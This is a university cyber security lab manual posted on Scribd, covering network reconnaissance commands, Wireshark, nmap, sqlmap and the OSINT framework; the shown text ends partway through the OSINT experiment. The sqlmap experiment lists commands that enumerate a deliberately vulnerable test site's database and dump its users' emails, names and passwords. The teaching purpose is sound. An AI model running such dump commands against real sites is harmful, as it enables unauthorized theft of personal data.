Scribd
Upload
14 views

CS Lab Manual-updated.docx

The document outlines the curriculum for a Cyber Security Laboratory course within the Electronics and Computer Science UG program, detailing its vision, mission, educational objectives, and outcomes. It includes course objectives, a detailed syllabus with modules on cyber crime, attack techniques, and web/network security, as well as practical lab components and assessment methods. The document also specifies the course evaluation criteria and provides guidelines for both students and faculty involved in the course.

Uploaded by

Vidya Gogate
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
14 views

CS Lab Manual-updated.docx

The document outlines the curriculum for a Cyber Security Laboratory course within the Electronics and Computer Science UG program, detailing its vision, mission, educational objectives, and outcomes. It includes course objectives, a detailed syllabus with modules on cyber crime, attack techniques, and web/network security, as well as practical lab components and assessment methods. The document also specifies the course evaluation criteria and provides guidelines for both students and faculty involved in the course.

Uploaded by

Vidya Gogate
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 107

UG Program in Electronics and Computer Science

Name: __________________________
Roll No: __________________________
Academic
20___ - 20___
Year:

Semester VII
Final Year

Electronics and Computer Science

Cyber Security
Laboratory
(ETDLOLR07031)
UG Program in Electronics and Computer Science

Institute
Vision: To become a globally recognized Mission: To impart high-quality technical
institution offering quality education and education to the students by providing an
enhancing professional standards excellent academic environment,
well-equipped laboratories and training
through the motivated teachers.
Department
Vision: Mission:
Impart quality education in Electronics and M1: To deliver quality academic program
computer science engineering to create world in electronics and computer science
class technocrats and entrepreneurs to meet engineering.
industry standards. M2: To develop skilled professionals
capable of providing Electronics and
computer-based solutions giving emphasis
to R&D for meeting industrial challenges.
M3: To improve employability and
entrepreneurship of electronics and
computer science engineers with ethical
and professional approach.

Program Educational Objectives (PEO) Program Specific Outcomes (PSOs)


PEO1- To develop a strong foundation of PSO1-Students will be able to analyze real
engineering fundamentals to build successful world problems, design and develop
careers maintaining high ethical standards. financially viable and ethical solutions based
PEO2- To equip graduates to pursue higher on electronics and computer science.
studies and research activities while PSO2- Students will be able to work
accomplishing lifetime learning. professionally for the benefit of society and
PEO3-To inculcate team spirit and leadership pursue research and higher studies.
qualities in graduates with the ability to
become Entrepreneurs in multi-disciplinary
fields recognized globally.
UG Program in Electronics and Computer Science

PROGRAM OUTCOMES: (POs)

1. Engineering knowledge: Apply the knowledge of mathematics, science, engineering fundamentals, and an engineering
specialization to the solution of complex engineering problems.

2. Problem analysis: Identify, formulate, review research literature, and analyze complex engineering problems reaching
substantiated conclusions using first principles of mathematics, natural sciences, and engineering sciences.

3. Design/development of solutions: Design solutions for complex engineering problems and design system components
or processes that meet the specified needs with appropriate consideration for the public health and safety, and the
cultural, societal, and environmental considerations.

4. Conduct investigations of complex problems: Use research-based knowledge and research methods including design
of experiments, analysis and interpretation of data, and synthesis of the information to provide valid conclusions.

5. Modern tool usage: Create, select, and apply appropriate techniques, resources, and modern engineering and IT tools
including prediction and modeling to complex engineering activities with an understanding of the limitations.

6. The engineer and society: Apply reasoning informed by the contextual knowledge to assess societal, health, safety,
legal and cultural issues and the consequent responsibilities relevant to the professional engineering practice.

7. Environment and sustainability: Understand the impact of the professional engineering solutions in societal and
environmental contexts, and demonstrate the knowledge of, and need for sustainable development.

8. Ethics: Apply ethical principles and commit to professional ethics and responsibilities and norms of the engineering
practice.

9. Individual and team work: Function effectively as an individual, and as a member or leader in diverse teams, and in
multidisciplinary settings.

10. Communication: Communicate effectively on complex engineering activities with the engineering community and with
society at large, such as, being able to comprehend and write effective reports and design documentation, make effective
presentations, and give and receive clear instructions.

11. Project management and finance: Demonstrate knowledge and understanding of the engineering and management
principles and apply these to one’s own work, as a member and leader in a team, to manage projects and in
multidisciplinary environments.

12. Life-long learning: Recognize the need for and have the preparation and ability to engage in independent and life-long
learning in the broadest context of technological change.
Mapping of PSOs to POs:

PSO Number PO Number

PSO1 PO1, PO2, PO3, PO4, PO5, PO7, PO8, PO11

PSO2 PO6, PO9, PO10, PO12

Sd/-
Program Coordinator
Electronics and Computer Science Program
UG Program in Electronics and Computer Science

A Laboratory Journal for

Cyber Security Lab


(ECDLOLR07043)
Semester VII

Bachelor of Technology
(B. Tech.)
in
Electronics and Computer Science
Department
Final Year with Effect from AY: 2024 -2025

Prepared By: Audited By: Approved By:

Dr. Bhavesh Patel


(Principal)
Dr. Asha Durafe Dr. Gayatri Bachhav
(Assistant Professor) (Subject Expert)
Dr. Subha Subramaniam
(Head of Department)
UG Program in Electronics and Computer Science

Program: Final Year B.Tech. Semester: VII L P C


Cyber Security Course Code: ECDLOCR07043 2 0 2
Cyber Security Lab Lab Code: ECDLOLR07043 0 2 1
2 2 3

Course Objectives:

1 To understand the need for Cyber Security Awareness.

2 To understand the flow and methodology of an attack.

3 To learn and explore various static and web vulnerability analysis tools.

4 To understand the various IPR, privacy and security compliances.

Course Outcomes:

After successful completion of this course, the students should be able to

CO 1: Explain the need of Cyber Security and its aspects.


Illustrate the various tools and techniques used by attackers to launch their attacks.
CO 2:

CO 3: Identify cyber-attacks and its countermeasures.

CO 4: Identify various web application and Network vulnerability scanning techniques and defense
methodologies.

Pre-requisite courses: Nil

Course Assessment Methods:


DIRECT
1.Continuous Internal Assessment (Theory component)
2. Assignments/Tutorials/Power-point-presentation/Group-discussion/Quiz/seminar/Case studies/Design
Thinking/Innovation/Creativity/Blog writing/Vlogging, etc.
3. Pre/Post - Experiment Test/Viva; Experimental Write-Up for each Experiment, Day to Day Experiments
/Assignments/Tutorials/Power-point-presentation/Group-discussion/Quiz/seminar/Case studies/Design
Thinking/Innovation/Creativity/Blog writing/Vlogging, etc. (Lab Component)
4. End Semester Examination (Theory and Lab components).
UG Program in Electronics and Computer Science

INDIRECT
1. Course-end survey
2. Activity based survey (if any)

DETAILED SYLLABUS

Module-1: Introduction to Cyber Space 07 Hours


1.1 Cyber Crime: Cybercrime definition, Types of Cybercrime. Classifications of cybercrime, Cyber
Hygiene, Types of Hackers - Hackers and Crackers - Cyber-Attacks and Vulnerabilities - Malware threats-
Sniffing - Gaining Access - Escalating Privileges - Executing Applications - Hiding Files, Covering Tracks
- Worms - Trojans - Viruses – Backdoors
1.2 Cyber Attacks: Cyber-attack Lifecycle, social engineering, Cyber stalking, Cybercafé and
Cybercrimes, Botnets, Attack vector, Attacks on Wireless and mobile Networks
Module-2: Cyber Crime Attacks and Techniques 06 Hours
2.1 Attacks Techniques: Password Cracking, Key loggers and Spywares Steganography, Identity Theft
(ID Theft), Banner Grabbing Techniques, ransom wares, Crypto wares.
2.2 Network information gathering, vulnerability scanning, Virtual Private Networks (VPN), Open
Port Identification, Social engineering, Types of social engineering, Prevention from being victim of social
engineering.
Module-3: Cyber Attacks and Preventions 06 Hours
3.1 Attacks on WIFI and prevention, traditional techniques, theft of internet hours, Wi-Fi measures.
3.2 Attacks on Mobile phone and prevention, mobile phone theft, mobile virus, Mishing, vishing,
smishing, hacking Bluetooth.

Module-4: Web and Network Security 07 Hours


4.1 Web Security: OWASP, Web Security Considerations, Management, Cookies, Privacy on Web, Web
Browser Attacks, Web Bugs, Clickjacking, Session Hijacking and Management, Phishing and
Pharming Techniques, Web Service Security
4.2 Network security: DOS, DDOS, defenses against Denial-of-Service Attacks. Virtual Private
Networks (VPN)

Lecture: 2 Hrs/Week Total Hours: 26 Hrs

LAB COMPONENT:
Suggested Topic of Experiments (Minimum 8 Experiments)
1. Study the use of network reconnaissance tools like WHOIS, dig, traceroute, nslookup to gather
information about networks and domain registrars.
2. Study of packet sniffer tools wireshark
3. Download, install nmap and use it with different options to scan open ports, perform OS fingerprinting,
UG Program in Electronics and Computer Science

ping scan, tcp port scan, udp port scan.


4. Study of malicious software using different tools
5. Study of Network security by Setup of Snort and study the logs.
6. Detect SQL injection vulnerabilities in a website database using SQLMap.
7. Study of OSINT framework.
8. Penetration testing using Metasploit (Kali Linux)
9. Cross-site scripting attack.
10.Study the behavior of protections such as IDF and firewalls when altering headers in network
packets.
11.Brute Force attack using Burp suite.
One beyond curriculum experiment may be conducted (To be decided by the Subject Teacher)

Practical: 2 Hrs/Week Total Hours:26 Hrs

Textbooks:
1. Nina Godbole, Sunit Belapure, “Cyber Security-Understanding Cyber Crimes, Computer Forensics
and Legal Perspective”,Wiley-India,2011.
2. The Complete Cyber Security Course -Volume 1- Nathan House
3. Eric Cole “Network Security Bible”, Second Edition, Wiley
Reference Books:
1. The Information technology Act, 2000; Bare Act- Professional Book Publishers, New Delhi.
2. James Graham,Richard Howard ,Ryan Olson. “ Cyber Security Essentials”, CRC Press,2018 print.
3. Michael Gregg, “Build your own Security Lab”, Wiley India.
4. Dieter Gollman, “Computer Security” , Third Edition, Wiley
UG Program in Electronics and Computer Science

Credit
Course Code Lab Name
s

ECDLOLR0704
Cyber Security Lab 1
3

Continuous Internal Assessment Practical (CIAP):

CIAP will be assessed for 50 marks on the following rubrics and scaled down to 10 marks

5 marks – Evaluation of write-up on day-to-day experiment in the laboratory (in terms of aim,
1
components/procedure, expected outcome)

The Course In charge will choose any two of the below mentioned components, with each component

having weightage of 20 marks each


2
Assignments/Tutorials/Power point presentation/Group discussion/Quiz/seminar/Case studies/Design

Thinking/Innovation/Creativity/Project/App development

3 Attendance will be having weightage of 5 marks

End Semester Examination (ESEP)

Based on the above contents and entire syllabus of ECDLOCR07043

1 The End Semester Examination Practical shall be conducted for 100 marks for a duration of three

hours and scaled down to 15 marks


UG Program in Electronics and Computer Science

Evaluation Method Passing Requirement

Continuous Internal Assessment (CIAP)+End

Semester Examination (ESEP)


Obtained Marks 40 % of maximum marks
UG Program in Electronics and Computer Science

Course Outcomes (CO)

CO No. CO Statement (At the end of the course, students will be able to …) BL

1 Explain the need of Cyber Security and its aspects. 3

2 Illustrate the various tools and techniques used by attackers to launch their attacks. 4

3 Identify cyber-attacks and its countermeasures. 1

Identify various web application and Network vulnerability scanning techniques and defense
4 1
methodologies.

List of Experiments
Sr.
Title CO PO PSO
No.

1 Network reconnaissance tools 1 1,2, 5,6, 8,12 1,2

2 Packet sniffer tools in Wireshark. 1 1,2, 5,6, 8,12 1,2

3 Network Discovery tools 2 1,2, 5,6, 8,12 1,2

2 1,2, 5,6, 8,12


SQL injection vulnerabilities in a website 1,2
4
database using SQLMap.

2 1,2, 5,6, 8,12 1,2


5 OSINT framework.

3 1,2, 5,6, 8,12 1,2


6 ARP poisoning Attack in Ettercap.

7 Cross-site scripting attack. 3 1,2, 5,6, 8,12 1,2

4 1,2, 5,6, 8,12 1,2


8 IDS and firewalls

CTF challenges and practice (Beyond curriculum 4


9 1,2,3,4, 5,6,8,12 1,2
experiment)

Mini Project/ Case Studies/ Problem 4 1,2,3,4, 5,6,8,12 1,2


10
Statement/Certifications
Name and Signature: Date:
UG Program in Electronics and Computer Science

Subject: __________________________________
INDEX
Initials of
Title of Date of Date of Page
Sr. No. Marks Teacher
Experiment/Assignment/Tutorial Performance Submission No.
with Remarks

Marks
Evaluation of write-up on day-to-day experiment in the laboratory (in terms of aim,
/05
components/procedure, expected outcome)
Assessment Method 1 /20
Assessment Method 2 /20
Attendance /05

This is to certify that Shri/Kum ...........................................................................................……………….


Batch.......................Roll No.............................................................Semester……………… has completed the
specified CIAP in the subject of ………………………………………..…………………………….in a satisfactory
manner in the college during the academic year of 20….. to 20……

Subject In-charge
UG Program in Electronics and Computer Science

Instructions for Students

1. For effective implementation and attainment of practical outcomes, in the beginning of each

exercise, students need to read through the complete write-up.

2. Students ought to refer to reference books, lab manuals, etc.

3. Students should not hesitate to ask about any difficulties which they face while performing

practical.

4. Algorithms & Flow graphs to be handwritten for programming subjects.

Guidelines for Faculties

1. There will be two sheets of blank pages after every practical for the student to report other

matters (if any), which is not mentioned in the printed practical.

2. For difficult practical if required, teachers could provide the demonstration of the practical

emphasizing of the skills which the students should achieve.

3. Teachers should give opportunities to students for hands-on work after the demonstration.

4. During the practical, ensure that each student gets a chance and takes active part in taking

observation/readings and performing practical.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25


UG Program in Electronics and Computer Science

Experiment No. – 1

Date of Performance:

Date of Submission:

Program Execution/
formation/ Timely
Viva Experiment
correction/ Submission Sign with Date
(03) Total (10)
ethical practices (01)
(06)

Experiment No. 1
Network reconnaissance tools

1.1 Aim: To use basic networking commands in Linux (ping, tracert, nslookup, netstat, ARP, RARP,
ip, ifconfig, dig, route).

1.2Course Outcome: Explain the need for Cyber Security and its aspects.

1.3 Learning Objectives: Explain the various commands involved in network reconnaissance.

1.4 Requirement: Kali Linux

1.5 Related Theory:


ifconfig command:
You can use the ifconfig command to assign an address to a network interface and to configure or
display the current network interface configuration information. The ifconfig command must be used at
system startup to define the network address of each interface present on a system.

Netstat command:
The netstat command displays information regarding traffic on the configured network interfaces, such
as the following:
● The address of any protocol control blocks associated with the sockets and the state of all

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-1


UG Program in Electronics and Computer Science
sockets
● The number of packets received, transmitted, and dropped in the communications subsystem
● Cumulative statistics per interface
● Routes and their status

Figure 1.1 Implementation of ifconfig command

Assign the IP address and netmask

Figure 1.2 Assign the IP address and netmask

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-2


UG Program in Electronics and Computer Science

Figure 1.3 Netstat command

Figure 1.4 Netstat command

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-3


UG Program in Electronics and Computer Science

Figure 1.5 Netstat command

Figure 1.6 Netstat command

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-4


UG Program in Electronics and Computer Science

traceroute command

Figure 1.7 traceroute command

nslookup command:

Figure 1.8 nslookup command

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-5


UG Program in Electronics and Computer Science

ARP:

Figure 1.9 arp command

Dig:

Figure 1.10 dig command

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-6


UG Program in Electronics and Computer Science
1.6 Procedure:

a) Execute all the commands listed above and observe the output.
b) By applying the variations in the above listed commands, note down the difference between
them.

1.7 Command and Output:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-7


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-8


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-9


UG Program in Electronics and Computer Science

1.8 Conclusion:
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
1.9 Questions:
1. The __________ command can show address information, manipulate routing, plus display network
various devices, interfaces, and tunnels.
2. The _____________ command is designed for capturing and displaying packets.
3. The ______________ tool is used for printing network connections, routing tables, interface statistics,
masquerade connections, and multicast memberships.
4. The ______________ utility is used to query Internet name servers interactively.
5. __________is a tool that verifies IP-level connectivity to another TCP/IP computer by sending Internet
Control Message Protocol (ICMP) Echo Request messages.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 1-10


UG Program in Electronics and Computer Science

Experiment No. – 2

Date of Performance:

Date of Submission:

Program Execution/
formation/ Timely
Viva Experiment
correction/ Submission Sign with Date
(03) Total (10)
ethical practices (01)
(06)

Experiment No. 2
Packet sniffer tools in Wireshark

2.1Aim: Use Packet sniffing tool: Wireshark to understand the operation of TCP/IP layers.

2.2Course Outcome: Explain the need for Cyber Security and its aspects.

2.3 Learning Objectives: Using Wireshark tool to explore networking algorithms and protocols.

2.4 Requirement: Kali Linux

2.5 Related Theory:

Wireshark-
Wireshark is a network protocol analyser, or an application that captures packets from a network
connection, such as from your computer to your home office or the internet. Packet is the name given
to a discrete unit of data in a typical Ethernet network.

Wireshark is the most often-used packet sniffer in the world. Like any other packet sniffer, Wireshark
does three things:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 2-1


UG Program in Electronics and Computer Science
Packet Capture: Wireshark listens to a network connection in real time and then grabs entire streams
of traffic – quite possibly tens of thousands of packets at a time.

Filtering: Wireshark is capable of slicing and dicing all of this random live data using filters. By
applying a filter, you can obtain just the information you need to see.

Visualization: Wireshark, like any good packet sniffer, allows you to dive right into the very middle
of a network packet. It also allows you to visualize entire conversations and network streams.

Figure 2.1 Wireshark

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 2-2


UG Program in Electronics and Computer Science

Figure 2.2 Viewing a packet capture in Wireshark

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 2-3


UG Program in Electronics and Computer Science

Figure 2.3 Drilling down into a packet to identify a network problem using Wireshark

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 2-4


UG Program in Electronics and Computer Science

Figure 2.4 Drilling down into a packet to identify a network problem using Wireshark

Figure 2.5 Applying filter

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 2-5


UG Program in Electronics and Computer Science

2.6 Simulated Output:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 2-6


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 2-7


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 2-8


UG Program in Electronics and Computer Science
2.7 Conclusion:

……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
2.8 Questions:

1. Wireshark used to be known as ___________.


2. ___________ Wireshark filter can be used to check all incoming requests to a HTTP Web
server.
3. ____________ Wireshark filter can be used to monitor outgoing packets from a specific
system on the network.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 2-9


UG Program in Electronics and Computer Science

Experiment No. – 3

Date of Performance:

Date of Submission:

Program Execution/
formation/ Timely
Viva Experiment
correction/ Submission Sign with Date
(03) Total (10)
ethical practices (01)
(06)

Experiment No. 3
Network Discovery tools

3.1Aim: Perform network discovery using discovery tools like NMAP.

3.2Course Outcome: To understand the flow and methodology of an attack.

3.3 Learning Objectives: Network discovery using NMAP.

3.4 Requirement: Kali Linux

3.5 Related Theory:

Nmap (“Network Mapper”) is an open-source tool for network exploration and security auditing. It
was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses
raw IP packets in novel ways to determine what hosts are available on the network, what services
(application name and version) those hosts are offering, what operating systems (and OS versions)
they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
While Nmap is commonly used for security audits, many systems and network administrators find it
useful for routine tasks such as network inventory, managing service upgrade schedules, and
monitoring host or service uptime.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 3-1


UG Program in Electronics and Computer Science
The output from Nmap is a list of scanned targets, with supplemental information on each depending
on the options used. Key to that information is the “interesting ports table”. That table lists the port
number and protocol, service name, and state. The state is either open, filtered, closed, or unfiltered.
Open means that an application on the target machine is listening for connections/packets on that port.
Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap
cannot tell whether it is open or closed. Closed ports have no application listening on them, though
they could open up at any time. Ports are classified as unfiltered when they are responsive to Nmap's
probes, but Nmap cannot determine whether they are open or closed. Nmap reports the state
combinations open|filtered and closed|filtered when it cannot determine which of the two states
describe a port. The port table may also include software version details when version detection has
been requested. When an IP protocol scan is requested (-sO), Nmap provides information on
supported IP protocols rather than listening ports.
In addition to the interesting ports table, Nmap can provide further information on targets, including
reverse DNS names, operating system guesses, device types, and MAC addresses.

Figure 3.1 Installing nmap

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 3-2


UG Program in Electronics and Computer Science

Figure 3.2 Running nmap

Figure 3.3 Running nmap in different modes

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 3-3


UG Program in Electronics and Computer Science

Figure 3.4 Running nmap in different modes

3.6 Command Listing and Output:

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 3-4


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 3-5


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 3-6


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 3-7


UG Program in Electronics and Computer Science
3.7 Conclusion:
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
3.8 Questions:

1. # 192.100.1.1/24 nmap -sp This command is used to perform ________scan.


2. The command for a ping scan is: ___________
3. nmap -p 80,443 192.168.1.100 In this command, the number 80 denotes the __________.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 3-8


UG Program in Electronics and Computer Science

Experiment No. – 4

Date of Performance:

Date of Submission:

Program Execution/
formation/ Timely
Viva Experiment
correction/ Submission Sign with Date
(03) Total (10)
ethical practices (01)
(06)

Experiment No. 4
SQL injection vulnerabilities in a website database
using SQLMap.

4.1Aim: Detect SQL injection vulnerabilities in a website database using SQLMap.

4.2Course Outcome: Illustrate the various tools and techniques used by attackers to launch their
attacks.

4.3 Learning Objectives: Detect SQL injection.

4.4 Requirement: Kali Linux

4.5 Related Theory:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious
SQL statements (also commonly referred to as a malicious payload) that control a web
application‘s database server (also commonly referred to as a Relational Database
Management System – RDBMS). Since an SQL injection vulnerability could possibly affect
any website or web application that makes use of an SQL-based database, the vulnerability is
one of the oldest, most prevalent and most dangerous of web application vulnerabilities.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-1


UG Program in Electronics and Computer Science
By leveraging SQL injection vulnerability, given the right circumstances, an attacker can use
it to bypass a web application‘s authentication and authorization mechanisms and retrieve the
contents of an entire database. SQL injection can also be used to add, modify and delete
records in a database, affecting data integrity.

To such an extent, SQL injection can provide an attacker with unauthorized access to
sensitive data including, customer data, personally identifiable information (PII), trade
secrets, intellectual property and other sensitive information.

SQLMAP: sqlmap is an open source penetration testing tool inbuilt in Kali Linux that
automates the process of detecting and exploiting SQL injection flaws and taking over of
database servers. It comes with a powerful detection engine, many niche features for the
ultimate penetration tester and a broad range of switches lasting from database fingerprinting,
over data fetching from the database, to accessing the underlying file system and executing
commands on the operating system via out- of-band connections.

4.6 Procedure:
Step 1: Open the package

Boot into your Kali linux machine. Start a terminal, and type –
sqlmap -h
It lists the basic commands that are supported by SqlMap. To start with, we’ll execute a simple
command.
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the –time-sec helps to speed up the process, especially when the server responses
are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –time-sec 15

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-2


UG Program in Electronics and Computer Science

Figure 4.1 Running sqlmap

Note: Depending on a lot of factors, sqlmap may sometimes ask you questions which have to be

answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might

come across-

● Some messages say that the database is probably Mysql, so sqlmap should skip all other

tests and conduct mysql tests only. Your answer should be yes (y).

● Some message asking you whether or not to use the payloads for specific versions of

Mysql. The answer depends on the situation. If you are unsure, then it's usually better to

say yes

● Step 2: Database

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-3


UG Program in Electronics and Computer Science
● In this step, we will obtain database names, column names and other useful data from the
database.
● So first we will get the names of available databases. For this we will add –dbs to our previous
command. The final result will look like –
● sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

Figure 4.2 step 2

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-4


UG Program in Electronics and Computer Science

Figure 4.3 step 3


Step 3: Tables

Now we are obviously interested in the acuart database. Information schema can be thought of as a

default table which is present on all your targets, and contains information about structure of

databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful

on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap

to enlist the tables using –tables command. The final sqlmap command will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-5


UG Program in Electronics and Computer Science

Figure 4.4 step 4


Step 4 : Columns

Now we will specify the database using -D, the table using -T, and then request the columns using

–columns. I hope you guys are starting to get the pattern by now. The most appealing table here is

users. It might contain the username and passwords of registered users on the website (hackers

always look for sensitive data). The final command must be something like-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-6


UG Program in Electronics and Computer Science

Figure 4.5 step 5


Step 5: Data

Now we will be getting data from multiple columns. As usual, we will specify the database with -D,

table with -T, and column with -C. We will get all data from specified columns using –dump. We

will enter multiple columns and separate them with commas. The final command will look like this.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C

email,name,pass –dump

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-7


UG Program in Electronics and Computer Science

Figure 4.6 Output

4.7 Simulated Output

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-8


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-9


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-10


UG Program in Electronics and Computer Science

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-11


UG Program in Electronics and Computer Science

4.8 Conclusion:

…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
4.8 Questions:

1. Through ____________________ system, we can detect SQL Injection attacks.


2. To prevent the SQL Injection attack, we
should______________________________________________________________________
3. To insert, update and delete the data are all the types of
__________________________attacks.
4. _______________________________is a Code Penetration Technique and loss to our
database could be caused due to it.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 4-12


UG Program in Electronics and Computer Science

Experiment No. – 5

Date of Performance:

Date of Submission:

Program Execution/
formation/ Timely
Viva Experiment
correction/ Submission Sign with Date
(03) Total (10)
ethical practices (01)
(06)

Experiment No. 5
OSINT Framework

5.1Aim: Detect SQL injection vulnerabilities in a website database using SQLMap.

5.2Course Outcome: Illustrate the various tools and techniques used by attackers to launch their
attacks.

5.3 Learning Objectives: Study of OSINT framework.

5.4 Requirement: Any type of web browser and Kali Linux

5.5 Related Theory:

OSINT Framework and its Functions:


The first phase in ethical hacking is reconnaissance, also known as footprinting and information
collecting, in which we gather as much information about the target as possible. OSINT plays a critical
role in obtaining information on the target. The OSINT framework plays such a crucial role in
information retrieval.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-1


UG Program in Electronics and Computer Science
What is OSINT Framework?
The OSINT framework is a cybersecurity structure that consists of a collection of OSINT technologies
that may be used to find information about a target more quickly and easily. It is a web-based platform
that allows you to browse several OSINT tools on various themes and goals based on your
requirements. The OSINT framework focuses on acquiring data through open-source tools and
resources. It can also be easily browsed looking at the OSINT tree and it provides excellent
classification of all existing intel sources.

5.6 Related Theory:

OSINT Framework Classification


The OSINT Framework can be accessed from websites:
https://osintframework.com/

On the right top corner of the screen, you can find indicators for some of the listed tools.
(T) — Indicates a link to a tool that must be installed and run locally
(D) — Google Dork (or Google Hacking)
(R) — Requires registration
(M) — Indicates a URL that contains the search term and the URL itself must be edited manually

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-2


UG Program in Electronics and Computer Science

Figure 5.1 OSINT Framework

Many categories are given in the shape of a tree in the above image, including email address,
username, domain name, IP address, social networks, and so on. When you click on any of the themes,
a sub-tree of useful resources appears.
So, if you’re looking for an email address, an IP address, or phone records, you can find them all in one
place, which is why the OSINT framework is so important for cybersecurity and information discovery.

Email address and IP address OSINT:


When you are searching for a breached email address, then you can find many links to useful resources
such as,
Have I been pwned?
Intelligence X
Vigilante.pw

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-3


UG Program in Electronics and Computer Science
Asley Madison Email , etc.
Similarly, if you are trying to analyze your network, then under IP address > Network Analysis Tool,
you can find different tools to analyze the network such as
Wireshark
NetworkMiner
Packet Total
Network Total

Figure 5.2 Expanded view of OSINT Framework

Nmap is a port scanning program that may be used to identify open ports, closed ports, and other
information. However, there are numerous additional tools in the OSINT framework for identifying
ways to scan ports, such as,
Zoom Eye
Scans.io
Shodan

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-4


UG Program in Electronics and Computer Science
Spyse
And many more.

Figure 5.3 Port discovery

Social Networking Platforms OSINT:


You can learn about social networking platforms such as Facebook, Twitter, Reddit, LinkedIn, and
others. You can locate your Facebook and Twitter accounts, as well as a variety of other details.
LinkedIn, on the other hand, does not make as much information available to the public. However,
there are a few tools available, like as
LinkedInt — LinkedIn Recon Tool
ScrapedIn
InSpy

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-5


UG Program in Electronics and Computer Science

Figure 5.4 Social Networking Platforms

Exploits and Advisories OSINT


Exploits and Advisories is another intriguing topic in the OSINT framework. Default passwords is an
area where you may search for various links to default password databases, lists, lookup utilities, and
so on.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-6


UG Program in Electronics and Computer Science

Figure 5.5 Exploits and advisories

Dark Web OSINT


Do you want to access the Dark Web? You can find information such as general information available
about deep web, dark web, and onion from reddit link? You can find information about the client by
downloading tools such as Tor Download and I2P Anonymous Network.
You can also find links to Onion scan, TorBot, TorScan, etc. If you want to search on TOR, you can
find different links to Onion Cab, Onion Link, Candle, etc. Links to TOR directories such as Hidden
Wiki, Core.onion and Onion Tree. Other links to Dark Web are Tor2web, Web O Proxy and IACA
Dark Web Investigation Support.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25 5-7


UG Program in Electronics and Computer Science

Figure 5.6 Dark web

Digital Currency OSINT


